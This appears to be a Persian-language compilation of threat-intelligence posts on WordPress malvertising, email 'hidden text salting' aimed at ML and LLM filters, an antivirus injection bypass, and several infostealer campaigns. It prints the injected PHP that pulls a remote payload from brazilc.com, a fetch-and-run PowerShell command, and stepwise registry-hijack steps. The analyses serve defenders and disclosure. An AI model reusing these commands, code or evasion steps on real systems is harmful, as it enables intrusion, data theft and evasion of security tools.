✅#WordPress

تحلیل کمپین Malvertising در وردپرس:
مهندسی معکوس تکنیک‌های پنهان‌سازی در functions.php

یک کمپین Malvertising (تبلیغات بدافزاری) پیچیده و در عین حال پنهان‌کار، وب‌سایت‌های وردپرسی را هدف قرار داده است. این کمپین با تزریق یک قطعه کد PHP به ظاهر بی‌خطر در فایل functions.php قالب فعال، کنترل کامل بر روی محتوای front-end وب‌سایت را به دست گرفته و بازدیدکنندگان را در معرض انواع تهدیدات، از جمله هدایت‌های اجباری (Forced Redirects) ، نمایش پاپ‌آپ‌های مخرب و بدافزارهای drive-by قرار می‌دهد.

فاز اول: شناسایی و نقطه نفوذ

حمله زمانی شناسایی شد که صاحبان وب‌سایت متوجه بارگذاری اسکریپت‌های جاوا اسکریپت مشکوک و ناخواسته‌ای شدند که هرگز توسط آن‌ها نصب نشده بود. بررسی سورس صفحه (View Page Source)، سرنخ اولیه را آشکار ساخت: یک تگ <noscript> که فایلی را از یک دامنه خارجی و ناشناس بارگذاری می‌کرد.

تحقیقات عمیق‌تر نشان داد که منشأ این تزریق، یک قطعه کد PHP است که به انتهای فایل functions.php قالب فعال وردپرس اضافه شده است. این فایل به دلیل نقش کلیدی در تعریف عملکردها و ویژگی‌های قالب، یک هدف ایده‌آل برای مهاجمان است.

بردار اصلی نفوذ در این کمپین، اغلب یکی از موارد زیر است:

* آسیب‌پذیری در افزونه‌ها یا قالب‌های قدیمی: مهاجمان با بهره‌برداری از یک آسیب‌پذیری شناخته‌شده، دسترسی لازم برای ویرایش فایل‌های قالب را به دست می‌آورند.

* اعتبارنامه‌های ضعیف یا سرقت‌شده: استفاده از رمزهای عبور ضعیف برای حساب مدیریت وردپرس، FTP یا کنترل پنل هاستینگ، مسیری مستقیم برای نفوذ فراهم می‌کند.

* مجوزهای دسترسی (Permissions) نادرست فایل‌ها: اگر فایل functions.php دارای مجوز نوشتن (writable) برای پروسس وب‌سرور باشد، بدافزارها می‌توانند به راحتی آن را ویرایش کنند.

فاز دوم: کالبدشکافی کد تزریق‌شده

کد تزریق‌شده در فایل functions.php به شکل زیر است. سادگی ظاهری این کد، قدرت پنهان‌کاری آن را افزایش می‌دهد:

// Injected PHP function in functions.php

function ti_custom_javanoscript() {
    $response = wp_remote_post(
     'https://brazilc.com/ads.php',
        array(
            'timeout' => 15,
            'body' => array('url' => home_url())
        )
    );
    if (!is_wp_error($response)) {
        echo wp_remote_retrieve_body($response);
    }
}

add_action('wp_head', 'ti_custom_javanoscript');

تحلیل دقیق عملکرد کد:

1۔ add_action('wp_head' , 'ti_custom_javanoscript'); : این خط، قلب مکانیزم حمله است. با استفاده از هوک (hook) وردپرسی wp_head ، تابع ti_custom_javanoscript در هر بار بارگذاری صفحه (page load) در تمام بخش‌های وب‌سایت، درست در داخل تگ <head> اجرا می‌شود. این تضمین می‌کند که کد مخرب قبل از هر اسکریپت دیگری بارگذاری و اجرا شود.

2۔ wp_remote_post(...) : این تابع وردپرسی یک درخواست HTTP POST به سرور فرماندهی و کنترل (C\&C) مهاجم به آدرس hxxps://brazilc[.]com/ads.php ارسال می‌کند. در بدنه (body) این درخواست، آدرس وب‌سایت آلوده (home_url()) نیز ارسال می‌شود که احتمالاً برای ردیابی قربانیان توسط مهاجمان استفاده می‌شود.

3۔ echo wp_remote_retrieve_body($response); : این بخش، حیاتی‌ترین قسمت است. پاسخ دریافت شده از سرور C\&C (که حاوی payload جاوا اسکریپت مخرب است) بدون هیچ‌گونه اعتبارسنجی یا پاک‌سازی، مستقیماً در خروجی HTML صفحه چاپ (echo) می‌شود. این تکنیک به مهاجم اجازه می‌دهد تا به صورت پویا و از راه دور، محتوای مخرب را در لحظه به مرورگر بازدیدکنندگان تزریق کند.

فاز سوم: تحلیل Payload جاوا اسکریپت

پاسخی که از سرور C\&C بازگردانده می‌شود، یک payload جاوا اسکریپت چندمرحله‌ای است که یک حمله دومرحله‌ای (Two-Pronged Attack) را اجرا می‌کند:

مرحله اول: سیستم توزیع ترافیک

اولین بخش از payload، اسکریپتی را از دامنه porsasystem[.]com (مشخصاً فایل 6m9x.js) بارگذاری می‌کند. این دامنه به عنوان یک سیستم توزیع ترافیک (TDS) عمل می‌کند. یک TDS، سرویسی است که بازدیدکنندگان را بر اساس پارامترهای مختلفی مانند موقعیت جغرافیایی، نوع سیستم‌عامل، مرورگر و... پروفایل کرده و سپس آن‌ها را به مخرب‌ترین یا سودآورترین مقصد بعدی هدایت می‌کند. این مقصد می‌تواند شامل موارد زیر باشد:

* صفحات فیشینگ

* سایت‌های تبلیغاتی مخرب

* کیت‌های بهره‌برداری (Exploit Kits)

* دانلود بدافزارهای دیگر (مانند باج‌افزار یا تروجان‌های بانکی)

این اسکریپت مسئول اصلی هدایت‌های ناخواسته و نمایش پاپ‌آپ‌هایی است که توسط کاربر گزارش شده است.

✅#Hidden_Text_Salting
آقای امید میرزائی محقق و سرپرست تیم امنیتی سیسکو تالوس خبر از کشف یک تکنیک فریبنده به نام "Hidden Text Salting" داد.

تحلیل تکنیک "Hidden Text Salting": سوءاستفاده از CSS برای فریب سیستم‌های امنیتی ایمیل

بر اساس گزارش ایشان، مهاجمان به طور فزاینده‌ای از یک تکنیک فریبنده به نام "Hidden Text Salting" برای دور زدن راهکارهای امنیتی ایمیل استفاده می‌کنند. این روش بر پایه سوءاستفاده از ویژگی‌های CSS (Cascading Style Sheets) برای تزریق و پنهان‌سازی محتوای بی‌ربط (که "Salt" یا "نمک" نامیده می‌شود) در بخش‌های مختلف ایمیل‌ها استوار است. هدف اصلی این تکنیک، مختل کردن و فریب دادن سیستم‌های تشخیص خودکار، از جمله الگوریتم‌های یادگیری ماشین و مدل‌های زبانی بزرگ (LLMs) است.

چرا مهاجمان از Hidden Text Salting استفاده می‌کنند؟

این تکنیک دو هدف اصلی را دنبال می‌کند:

1. فرار مستقیم از تشخیص (Direct Evasion): مهاجمان با افزودن محتوای بی‌ربط و تصادفی به بدنه ایمیل، امضاها (Signatures) و الگوهای متنی که توسط سیستم‌های امنیتی برای شناسایی ایمیل‌های مخرب استفاده می‌شوند را برهم می‌زنند. این کار تحلیل محتوای ایمیل را برای موتورهای تشخیص دشوارتر می‌کند.

2. اختلال در فرآیندهای جانبی (Indirect Evasion): این روش می‌تواند سایر بخش‌های خط لوله تحلیل امنیتی را نیز تحت تأثیر قرار دهد. برای مثال، با تزریق کلماتی از یک زبان دیگر (مانند فرانسوی در یک ایمیل انگلیسی)، می‌توانند ماژول‌های تشخیص زبان را به اشتباه بیندازند و باعث شوند فیلترهای اسپم مبتنی بر زبان، به درستی عمل نکنند.

محتوای "Salt" در کدام بخش‌های ایمیل تزریق می‌شود؟

تحقیقات نشان می‌دهد که مهاجمان عمدتاً در چهار بخش کلیدی ایمیل محتوای پنهان را جایگذاری می‌کنند:

1۔ Preheader: متن کوتاهی که در پیش‌نمایش اینباکس، بلافاصله بعد از عنوان ایمیل نمایش داده می‌شود. مهاجمان می‌توانند در این بخش، متون بی‌ربطی را با استفاده از CSS پنهان کنند تا موتورهای تحلیل را فریب دهند.

2۔ Header: بخش‌های بالایی ایمیل که کمتر متداول است اما همچنان به عنوان محلی برای تزریق محتوای پنهان استفاده می‌شود.

3۔ پیوست‌ها (Attachments): به خصوص در پیوست‌های HTML، مهاجمان کاراکترها یا کامنت‌های بی‌ربط را بین کدهای مهم (مانند رشته‌های Base64) قرار می‌دهند تا تحلیل استاتیک فایل را پیچیده و فرآیند استخراج URLهای مخرب را دشوار سازند.

4۔ بدنه ایمیل (Email Body): این متداول‌ترین محل برای تزریق Salt است. مهاجمان کاراکترهای پنهان را بین کلمات کلیدی (مانند نام برندها) قرار می‌دهند تا شناسایی آن‌ها توسط فیلترهای محتوا را مختل کنند.

انواع محتوای مورد استفاده به عنوان Salt

سه نوع محتوای اصلی برای این هدف به کار گرفته می‌شود:

1. کاراکترها (Characters): شامل کاراکترهای تصادفی که بین کلمات کلیدی قرار می‌گیرند یا کاراکترهای خاص با عرض صفر (Zero-Width) مانند ZWSP و ZWNJ که بین حروف یک برند (مانند Norton LifeLock) تزریق می‌شوند. این کاراکترها با چشم غیرمسلح دیده نمی‌شوند اما توسط پارسرهای ایمیل به عنوان بخشی از رشته متنی شناسایی می‌شوند.

2. پاراگراف‌ها (Paragraphs): جملات و عبارات کاملاً بی‌ربط (مثلاً به زبان آلمانی در یک ایمیل فیشینگ انگلیسی) که در بدنه ایمیل گنجانده شده و سپس با استفاده از CSS کاملاً پنهان می‌شوند.

3. کامنت‌ها (Comments): به ویژه در پیوست‌های HTML، کامنت‌های بی‌ربط زیادی بین کدهای JavaScript یا سایر بخش‌های کلیدی قرار داده می‌شود تا تحلیل استاتیک را دشوار کند.

تکنیک‌های رایج CSS برای پنهان‌سازی محتوا

مهاجمان از سه دسته اصلی ویژگی‌های CSS برای نامرئی کردن Salt سوءاستفاده می‌کنند:

1. ویژگی‌های متنی (Text Properties):

*۔ font-size: تنظیم اندازه فونت روی صفر یا یک مقدار بسیار کوچک.

*۔ color: تنظیم رنگ متن به همان رنگ پس‌زمینه (مثلاً سفید روی سفید).

2. ویژگی‌های نمایش و شفافیت (Visibility and Display Properties):

*۔ opacity: 0: المان را کاملاً شفاف و نامرئی می‌کند.

*۔ display: none: المان را به طور کامل از چیدمان صفحه حذف می‌کند.

*۔ visibility: hidden: المان را پنهان می‌کند اما فضای آن در چیدمان صفحه حفظ می‌شود.

3. ویژگی‌های اندازه و برش (Clipping and Sizing Properties):

*۔ width: 0 یا height: 0: عرض یا ارتفاع کانتینر حاوی متن Salt را صفر قرار می‌دهند.

*۔ overflow: hidden: محتوای اضافی یک کانتینر کوچک را پنهان می‌کنند. برای مثال، متن بزرگی را در یک دایره با شعاع صفر قرار داده و سرریز آن را مخفی می‌کنند.

شیوع این تکنیک در ایمیل‌های اسپم در مقابل ایمیل‌های قانونی

✅#APT35

💢 Iran-linked APT35

@NullError_ir

✅#Chaos

باج‌افزار Chaos سریع‌تر، هوشمندتر و خطرناک‌تر از قبل

✅#Bypassing_Antivirus

تحلیل جامع آسیب‌پذیری تزریق کد به فرآیندهای آنتی‌ویروس

یک تکنیک پیشرفته و بسیار مهم که توسط یک پژوهشگر امنیت سایبری با نام مستعار "Two Seven One Three" کشف شده است. این تکنیک به مهاجمان اجازه می‌دهد تا با سوءاستفاده از مکانیزم‌های حفاظتی خود نرم‌افزارهای آنتی‌ویروس، کدهای مخرب را مستقیماً به فرآیندهای اصلی و محافظت‌شده‌ی این محصولات امنیتی تزریق کنند. این روش نه تنها به مهاجم امکان می‌دهد تا از دید سیستم‌های امنیتی پنهان بماند، بلکه به او اجازه می‌دهد تا یک درب پشتی (Backdoor) پایدار در سیستمی ایجاد کند که قاعدتاً باید تحت محافظت شدید باشد.

در ادامه، جزئیات کامل این تکنیک، و اهمیت آن را بررسی می‌کنیم.

۱. مکانیزم‌های دفاعی آنتی‌ویروس‌ها (چرا این حمله مهم است؟)

برای درک عمق این آسیب‌پذیری، ابتدا باید بدانیم آنتی‌ویروس‌ها چگونه از خودشان در برابر حملات محافظت می‌کنند:

سطح دسترسی SYSTEM: فرآیندهای آنتی‌ویروس معمولاً با بالاترین سطح دسترسی در ویندوز (SYSTEM) اجرا می‌شوند تا بتوانند بر تمام فعالیت‌های سیستم نظارت کرده و تهدیدات را خنثی کنند.

محافظت از فرآیند (Process Protection): آنتی‌ویروس‌ها از مکانیزم‌هایی مانند Protected Process Light (PPL) در ویندوز استفاده می‌کنند. این ویژگی اجازه نمی‌دهد که حتی فرآیندهایی با دسترسی مدیر (Administrator) بتوانند فرآیندهای محافظت‌شده را دستکاری، متوقف یا به آن‌ها کد تزریق کنند. به همین دلیل این فرآیندها "unkillable" یا غیرقابل توقف نامیده می‌شوند.

بررسی یکپارچگی کد (Code Integrity Checks): آنتی‌ویروس‌ها به‌طور مداوم بررسی می‌کنند که ماژول‌ها و کتابخانه‌هایی (DLL) که در فرآیندهایشان بارگذاری می‌شوند، دارای امضای دیجیتال معتبر باشند و دستکاری نشده باشند.

درایورهای سطح کرنل (Kernel-Level Drivers): درایورهای آنتی‌ویروس در سطح هسته سیستم‌عامل (Kernel) فعالیت می‌کنند و هرگونه تلاش برای تغییر در مکانیزم‌های شناسایی یا دستکاری فرآیندهای محافظت‌شده را مسدود می‌کنند.

حفاظت از فایل‌ها و رجیستری: آنتی‌ویروس‌ها از دسترسی و نوشتن در پوشه نصب خود و کلیدهای رجیستری مربوط به خودشان به‌شدت محافظت می‌کنند تا از غیرفعال شدن یا دستکاری آن‌ها جلوگیری شود.

این حمله دقیقاً این لایه‌های دفاعی را هدف قرار می‌دهد و آن‌ها را دور می‌زند.

۲. تشریح تکنیک حمله: شبیه‌سازی سرویس و تزریق کد

این تکنیک در دو مرحله اصلی انجام می‌شود:

مرحله اول: شبیه‌سازی سرویس محافظت‌شده (Service Cloning)

مهاجم به‌جای حمله مستقیم به سرویس اصلی و در حال اجرای آنتی‌ویروس (که تقریباً غیرممکن است)، یک کپی یا "کلون" از آن سرویس ایجاد می‌کند.

1. صادر کردن کلید رجیستری: مهاجم کلید رجیستری مربوط به یکی از سرویس‌های محافظت‌شده آنتی‌ویروس (مثلاً BDProtSrv در Bitdefender) را پیدا کرده و آن را Export می‌کند. این کلید حاوی تمام تنظیمات و پیکربندی‌های آن سرویس است.

2. وارد کردن کلید با نام جدید: سپس مهاجم همان کلید رجیستری را با یک نام جدید Import می‌کند. با این کار، یک سرویس کاملاً جدید اما با همان مشخصات و سطح حفاظت سرویس اصلی در سیستم تعریف می‌شود.

3. بارگذاری سرویس کلون‌شده: پس از راه‌اندازی مجدد سیستم (Reboot)، سرویس‌منیجر ویندوز (Services.exe) این سرویس جدید را شناسایی کرده و آن را در حافظه پنهان خود بارگذاری می‌کند. حالا مهاجم یک سرویس کلون‌شده دارد که مانند سرویس اصلی، محافظت‌شده (PPL) است و با دسترسی SYSTEM اجرا می‌شود.

مرحله دوم: تزریق کد از طریق ربودن ارائه‌دهنده رمزنگاری (Hijacking Cryptographic Provider)

از آنجایی که تزریق مستقیم کد به فرآیند محافظت‌شده کلون‌شده نیز مسدود است، مهاجم از یک مسیر هوشمندانه و غیرمستقیم استفاده می‌کند:

1۔ API رمزنگاری ویندوز: فرآیندهای آنتی‌ویروس برای عملیات مختلفی مانند بررسی امضای دیجیتال و رمزنگاری، از توابع API رمزنگاری ویندوز (Windows Cryptography API) استفاده می‌کنند. این API برای یافتن ارائه‌دهندگان خدمات رمزنگاری (Providers) به یک مسیر مشخص در رجیستری مراجعه می‌کند.

2. تغییر مسیر در رجیستری: مهاجم کلید رجیستری زیر را دستکاری می‌کند:

HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider

او مسیر پیش‌فرض را به مسیر فایل DLL مخرب خود تغییر می‌دهد.

3. بارگذاری DLL مخرب: هنگامی که سرویس کلون‌شده آنتی‌ویروس اجرا می‌شود، برای انجام عملیات رمزنگاری، به مسیر دستکاری‌شده در رجیستری مراجعه می‌کند و ناآگاهانه، DLL مخرب مهاجم را به جای کتابخانه اصلی و معتبر ویندوز، در فضای حافظه خود بارگذاری (Load) می‌کند.

✅#RealBlindingEDR

ابزار RealBlindingEDR غیرفعال‌سازی دائمی AV/EDR با استفاده از Kernel Callbackها

ابزاری متن‌باز که به مهاجمان این امکان را می‌دهد که با پاک‌سازی callbackهای حیاتی سطح کرنل در سیستم‌عامل ویندوز، نرم‌افزارهای آنتی‌ویروس (AV) و تشخیص و پاسخ نقطه پایانی (EDR) را کور (blind)، به‌طور دائم غیرفعال یا خاتمه دهند.

✅#Stealit

تحلیل کمپین بدافزار جدید Stealit
و بهره‌برداری از قابلیت Node.js SEA برای پنهان‌سازی و گسترش

محققان FortiGuard به تازگی یک کمپین فعال و جدید از بدافزار سرقت اطلاعات Stealit را شناسایی کرده است که از یک تکنیک نوآورانه برای توزیع و اجرای payloadهای خود بهره می‌برد. این کمپین با استفاده از قابلیت آزمایشی Single Executable Application (SEA) در Node.js، اسکریپت‌های مخرب خود را به صورت یک فایل اجرایی مستقل بسته‌بندی می‌کند. این رویکرد به بدافزار اجازه می‌دهد تا بدون نیاز به پیش‌نصب بودن Node.js روی سیستم قربانی، اجرا شود و در نتیجه شناسایی آن را دشوارتر می‌سازد.

در ادامه، تحلیل فنی دقیقی از این کمپین، از مکانیزم توزیع تا اجزای اصلی و تکنیک‌های فرار از تحلیل آن ارائه می‌شود.

زنجیره آلودگی و توزیع

بدافزار Stealit ، همانند نسخه‌های پیشین، خود را در قالب نصب‌کننده‌های نرم‌افزارهای قانونی مانند بازی‌ها و برنامه‌های VPN مخفی می‌کند. این فایل‌های آلوده از طریق پلتفرم‌های اشتراک‌گذاری فایل نظیر Mediafire و Discord توزیع می‌شوند. مهاجمان برای پیچیده‌تر کردن فرآیند تحلیل، این نصب‌کننده‌ها را با ابزارهایی مانند PyInstaller بسته‌بندی کرده یا در آرشیوهای فشرده قرار می‌دهند.

جالب توجه است که وب‌سایت پنل کنترل و فرماندهی (C2) این بدافزار نیز به دامنه‌های جدیدی منتقل شده است. این وب‌سایت، Stealit را به عنوان یک "راه‌حل حرفه‌ای استخراج داده" با طرح‌های اشتراک مختلف برای سیستم‌عامل‌های ویندوز و اندروید تبلیغ می‌کند و حتی یک کانال تلگرامی برای جذب مشتریان بالقوه دارد.

تحلیل فنی نصب‌کننده (Installer)

فرآیند نصب بدافزار چند لایه و بسیار پیچیده است و در تمام مراحل از obfuscation سنگین برای جلوگیری از تحلیل کد استفاده می‌شود.

#**لایه اول: بهره‌برداری از Node.js SEA**

فایل اجرایی اولیه یک بسته Node.js SEA است. این قابلیت آزمایشی، تمام اسکریپت‌ها و وابستگی‌های لازم را در یک فایل باینری واحد جمع‌آوری می‌کند. اسکریپت مخرب اصلی در بخشی از منابع فایل اجرایی به نام NODE_SEA_BLOB ذخیره شده است. بررسی متادیتای این بخش نشان می‌دهد که این بسته با استفاده از یک پروژه متن‌باز به نام AngaBlue ساخته شده که فرآیند ایجاد فایل‌های اجرایی SEA را خودکار می‌کند.

#**لایه‌های دوم و سوم: اجرای درون حافظه**

اسکریپت لایه اول پس از اجرا، یک blob بزرگ و رمزنگاری‌شده را از داخل خود استخراج، رمزگشایی و با استفاده از تابع require در Node.js مستقیماً در حافظه اجرا می‌کند. این اسکریپت لایه دوم نیز به نوبه خود، اسکریپت لایه سوم را که باز هم به شدت مبهم‌سازی شده، در حافظه اجرا می‌کند. این تکنیک زنجیره‌ای اجرای درون حافظه، تحلیل مبتنی بر فایل را بسیار دشوار می‌سازد.

تکنیک‌های ضد تحلیل (Anti-Analysis)

اسکریپت لایه سوم، پیش از نصب اجزای اصلی، مجموعه‌ای گسترده از بررسی‌ها را برای تشخیص محیط‌های تحلیل و ماشین‌های مجازی انجام می‌دهد. این بررسی‌ها شامل موارد زیر است:

* تشخیص محیط مجازی: حداقل حافظه سیستم (2GB)، تعداد هسته‌های پردازنده (حداقل 2)، و بررسی نام کاربری و نام میزبان در برابر لیست سیاه کلمات کلیدی (مانند vmware , sandbox , analyst , test ).

* بررسی فایل‌ها و مسیرهای مشکوک: جستجو برای فایل‌ها و درایورهای مرتبط با VMware و VirtualBox.

* تحلیل زمانی (Timing Analysis): اندازه‌گیری زمان اجرای عملیات ریاضی برای تشخیص کندی ناشی از دیباگرها.

* شناسایی فرآیندهای پیشرفته: اجرای دستور wmic برای لیست کردن تمام فرآیندها و جستجو برای نام ابزارهای تحلیل رایج (مانند wireshark , x64dbg , IDA , Ghidra , Process Monitor ) یا آرگومان‌های مرتبط با دیباگ.

* بررسی پورت‌های شبکه: اجرای netstat –an برای یافتن پورت‌های فعال که در لیست سیاه قرار دارند.

* تحلیل رجیستری: بررسی کلیدهای رجیستری مرتبط با دیباگرها.

* تشخیص تزریق DLL: بررسی DLLهای بارگذاری‌شده در فرآیند بدافزار برای یافتن موارد مرتبط با ابزارهای تحلیل.

* بررسی فرآیند والد (Parent Process): چک کردن فرآیند والد برای اطمینان از اینکه خود توسط یک ابزار تحلیل اجرا نشده باشد.

اگر هر یک از این بررسی‌ها نشان دهد که بدافزار در حال تحلیل است، با نمایش یک پیام خطا، اجرای خود را متوقف می‌کند.

نصب و ماندگاری اجزای اصلی

پس از عبور موفقیت‌آمیز از بررسی‌های ضد تحلیل، نصب‌کننده سه کامپوننت اصلی را از سرور C2 دانلود می‌کند: save_data.exe , stats_db.exe و game_cache.exe .

این فایل‌ها در یک مسیر تصادفی در AppData\Local ذخیره می‌شوند و برای جلوگیری از اسکن توسط Windows Defender، مسیر دایرکتوری ایجاد شده با استفاده از یک دستور PowerShell به لیست استثنائات (Exclusion list) آن اضافه می‌شود.

✅#SEAL

دانشگاه MIT یک هوش مصنوعی ساخته که می‌تونه کد خودش رو بازنویسی کنه تا باهوش‌تر بشه.

بهش میگن SEAL (مدل‌های زبانی خود-تطبیق‌پذیر) .

به جای اینکه انسان‌ها تنظیمش کنن، SEAL اطلاعات جدید رو خونده، اونا رو با کلمات خودش بازنویسی می‌کنه و به‌روزرسانی‌های گرادیان رو روی خودش اجرا می‌کنه و به معنای واقعی کلمه یادگیری خودراهبر داره.

و ما تازه وارد عصر مدل‌های خود-تکاملی شدیم.

✅#Satellites

پژوهشگران دو دانشگاه مطرح آمریکا‌ بمدت سه سال یک آنتن نه چندان پیچیده رو به سمت آسمان گرفتند و به داده‌ هاییکه بین ایستگاهای زمینی و ماهواره ها مبادله می‌شد گوش دادند. نتیجه تحقیق تکان‌دهنده هست!

اونها موفق به ضبط هزاران گفت‌وگوی صوتی و پیام کوتاه رمزنگاری نشده رو از کاربران یک شبکهٔ تلفن همراه شدند. همچنین ارتباطات برخی از نهادهای نظامی و اطلاعاتی در بین داده های ثبت شده وجود داشت که از اهمیت بالایی برخوردارند. این پژوهش نشون میده که نزدیک به نیمی از پیام‌های ماهواره‌ای در مدار ثابت زمین بدون هیچ گونه رمزنگاری مبادله می‌شوند. یعنی سیلی از داده‌های بسیار حساس از فراز زمین عبور میکنند و هر کس با یک ابزار ساده و هزینه ای کمتر از ۸۰۰ دلار قادر به دریافت انهاست.

✅#Rootkit

تحلیلی عمیق بر یک روت‌کیت پیشرفته و پنهان‌کار هسته لینوکس

Singularity - Powerful Linux Kernel Rootkit

✅#North_Korean_Hackers

تحلیل یک حمله:
ترکیب BeaverTail و OtterCookie با ماژول جدید Keylogging

گروه (APT) Famous Chollima ، که زیرمجموعه‌ای از گروه بزرگ‌تر Lazarus و همسو با منافع اقتصادی کره شمالی (DPRK) است، بار دیگر با تکامل ابزارهای خود، جامعه توسعه‌دهندگان و جویندگان کار در حوزه فناوری را هدف قرار داده است. در جدیدترین کمپین کشف‌شده ، این گروه با ترکیب دو بدافزار مجزای پیشین، BeaverTail و OtterCookie ، و افزودن یک ماژول جدید مبتنی بر جاوا اسکریپت برای Keylogging و (Screenshotting) ، یک ابزار سرقت اطلاعات یکپارچه و قدرتمند ایجاد کرده است.

بررسی اجمالی کمپین و تاکتیک‌ها

- هدف: سرقت اطلاعات حساس، به ویژه ارزهای دیجیتال و اطلاعات اعتباری (credentials).

- قربانیان: عمدتاً جویندگان کار و توسعه‌دهندگان نرم‌افزار.

- روش مهندسی اجتماعی: مهاجمان با جعل هویت سازمان‌های استخدامی و ارائه پیشنهادات شغلی جعلی، قربانیان را فریب می‌دهند تا یک اپلیکیشن آلوده را به عنوان بخشی از فرآیند مصاحبه یا آزمون فنی نصب کنند.

- نمونه موردی: در این حمله، یک سازمان در سریلانکا به صورت غیرمستقیم مورد هدف قرار گرفت. یکی از کارمندان این سازمان، فریب یک پیشنهاد شغلی جعلی را خورده و یک اپلیکیشن تروجانایز شده مبتنی بر Node.js به نام "Chessfi" را نصب کرده است. این اپلیکیشن که ظاهراً یک پلتفرم شطرنج مبتنی بر وب ۳ برای شرط‌بندی با ارز دیجیتال است، به عنوان طعمه‌ای ایده‌آل برای جذب اهداف علاقه‌مند به این حوزه عمل می‌کند.

زنجیره آلودگی: یک فرآیند چندمرحله‌ای و پنهان‌کارانه

مهاجمان برای پنهان کردن فعالیت مخرب خود از یک زنجیره آلودگی پیچیده استفاده می‌کنند که تشخیص آن برای یک توسعه‌دهنده معمولی دشوار است:

1. کلون کردن پروژه: قربانی از طریق پلتفرم‌هایی مانند Fiverr یا Discord ترغیب می‌شود تا یک پروژه نرم‌افزاری را از یک مخزن Git (در این مورد، Bitbucket) کلون کند.

2. نصب وابستگی‌ها: طبق دستورالعمل‌های موجود در فایل README.md ، قربانی دستور npm install را برای نصب پکیج‌های مورد نیاز پروژه اجرا می‌کند.

3. اجرای پکیج مخرب: در میان وابستگی‌ها، یک پکیج مخرب به نام node-nvm-ssh که در مخزن رسمی NPM منتشر شده، دانلود و نصب می‌شود.

4. اسکریپت postinstall: فایل package.json این پکیج مخرب حاوی یک اسکریپت postinstall است. این اسکریپت به گونه‌ای طراحی شده که پس از اتمام نصب به طور خودکار اجرا شود. این اسکریپت، دستورات دیگری را فراخوانی می‌کند که در نهایت به اجرای یک فایل جاوا اسکریپت منجر می‌شود.

5. ایجاد فرآیند فرزند (Child Process): یک اسکریپت میانی (index.js) یک فرآیند فرزند جدا شده (detached child process) را ایجاد می‌کند تا اسکریپت مخرب بعدی (file15.js) را اجرا کند. این کار به بدافزار اجازه می‌دهد حتی پس از بسته شدن ترمینال اصلی، به اجرای خود ادامه دهد.

6. بارگذاری پیلود نهایی: اسکریپت file15.js محتویات یک فایل به نام test.list را می‌خواند و با استفاده از تابع eval() آن را اجرا می‌کند. این فایل حاوی پیلود نهایی است؛ یک کد جاوا اسکریپت بسیار بزرگ و مبهم‌سازی شده (Obfuscated) که ترکیبی از BeaverTail و OtterCookie است.

تکامل بدافزار: ادغام BeaverTail و OtterCookie

تا پیش از این، BeaverTail و OtterCookie به عنوان دو ابزار مجزا اما مکمل عمل می‌کردند. اما در این کمپین، کارکردهای آن‌ها در یک پیلود واحد ادغام شده است.

#**قابلیت‌های به ارث برده از BeaverTail:

- **شمارش پروفایل‌ها و افزونه‌های مرورگر: جستجو برای پروفایل‌های مرورگرهای مختلف و افزونه‌های نصب‌شده، به ویژه افزونه‌های مرتبط با کیف پول‌های ارز دیجیتال.

- دانلود پیلود ثانویه: قابلیت دانلود و اجرای ماژول‌های پایتونی مانند InvisibleFerret (یک ابزار سرقت اطلاعات) از سرور فرماندهی و کنترل (C2).

- نصب ابزار دسترسی از راه دور: در نسخه‌های قدیمی‌تر، ابزارهایی مانند AnyDesk را برای کنترل کامل سیستم قربانی نصب می‌کرد.

#**قابلیت‌های OtterCookie و ماژول جدید آن (نسخه v5):

۔ OtterCookie از یک ابزار ساده برای بارگذاری کد از راه دور به یک بدافزار ماژولار و پیشرفته تبدیل شده است.

- **ماژول Remote Shell: با استفاده از پکیج socket.io-client یک ارتباط پایدار با سرور C2 برقرار کرده و به مهاجم اجازه می‌دهد دستورات را از راه دور روی سیستم قربانی اجرا کند.

- ماژول سرقت فایل: فایل سیستم را برای یافتن فایل‌های "جذاب" با الگوها و پسوندهای مشخص (مانند env , .metamask , .wallet , .pdf , .docx , .secret. , ... ) جستجو کرده و آن‌ها را به سرور C2 آپلود می‌کند.

✅#TikTok

هکرها با استفاده از ویدیوهای TikTok، بدافزار خود را نصب می‌کنند

این گزارش به تحلیل یک کمپین فعال مهندسی اجتماعی در پلتفرم TikTok می‌پردازد که کاربران را با وعده فعال‌سازی رایگان نرم‌افزارهای گران‌قیمت مانند Photoshop، فریب داده و به نصب بدافزار سارق اطلاعات (InfoStealer) به نام AuroStealer آلوده می‌کند. این تحلیل، زنجیره آلودگی (Kill Chain) و تکنیک‌های پیشرفته مورد استفاده مهاجمان را تشریح می‌کند.

مهاجمان از پلتفرم محبوب TikTok برای انتشار ویدئوهای فریبنده استفاده می‌کنند.

* طعمه : ارائه راهی آسان برای فعال‌سازی رایگان Adobe Photoshop.

* تکنیک: این حمله از یک تکنیک مهندسی اجتماعی مشابه ClickFix بهره می‌برد. در این روش، به جای ارسال یک فایل اجرایی، قربانی ترغیب می‌شود تا با دسترسی Administrator ، یک خط فرمان PowerShell را مستقیماً اجرا کند. این کار باعث می‌شود کاربر، خود، مکانیزم‌های امنیتی اولیه را دور بزند.

* فرمان مخرب:

iex (irm slmgr[.]win/photoshop)

۔* irm (Invoke-RestMethod): این cmdlet محتوا را از URL مشخص شده (slmgr[.]win/photoshop) دانلود می‌کند.

۔* iex (Invoke-Expression): این cmdlet خطرناک، محتوای دانلود شده (که یک اسکریپت پاورشل است) را مستقیماً در حافظه اجرا می‌کند. این یک تکنیک "fileless" (بدون فایل) است که از شناسایی مبتنی بر فایل توسط آنتی‌ویروس‌ها جلوگیری می‌کند.

## تحلیل زنجیره آلودگی (Kill Chain Analysis)

مرحله اول: اسکریپت پاورشل (Stager)

اسکریپت پاورشل دانلود شده از slmgr[.]win (با هش SHA256: 6D897B56...) به عنوان مرحله اول (Stager) عمل می‌کند و دو وظیفه اصلی دارد:

1. دانلود payload: دانلود مرحله بعدی بدافزار (updater.exe) از آدرس https://file-epq[.]pages[.]dev/updater.exe

2. ایجاد ماندگاری (Persistence):

* این اسکریپت یک Scheduled Task (وظیفه زمان‌بندی شده) ایجاد می‌کند تا بدافزار در هر بار لاگین کاربر اجرا شود (-Trigger (New-ScheduledTaskTrigger -AtLogOn)).

* تکنیک فرار از شناسایی (Evasion): برای جلوگیری از شناسایی و ترکیب شدن با وظایف سیستمی، اسکریپت به صورت تصادفی یکی از نام‌های موجه زیر را برای وظیفه خود انتخاب می‌کند:

* MicrosoftEdgeUpdateTaskMachineCore
* GoogleUpdateTaskMachineCore
* AdobeUpdateTask
* OfficeBackgroundTaskHandlerRegistration
* WindowsUpdateCheck

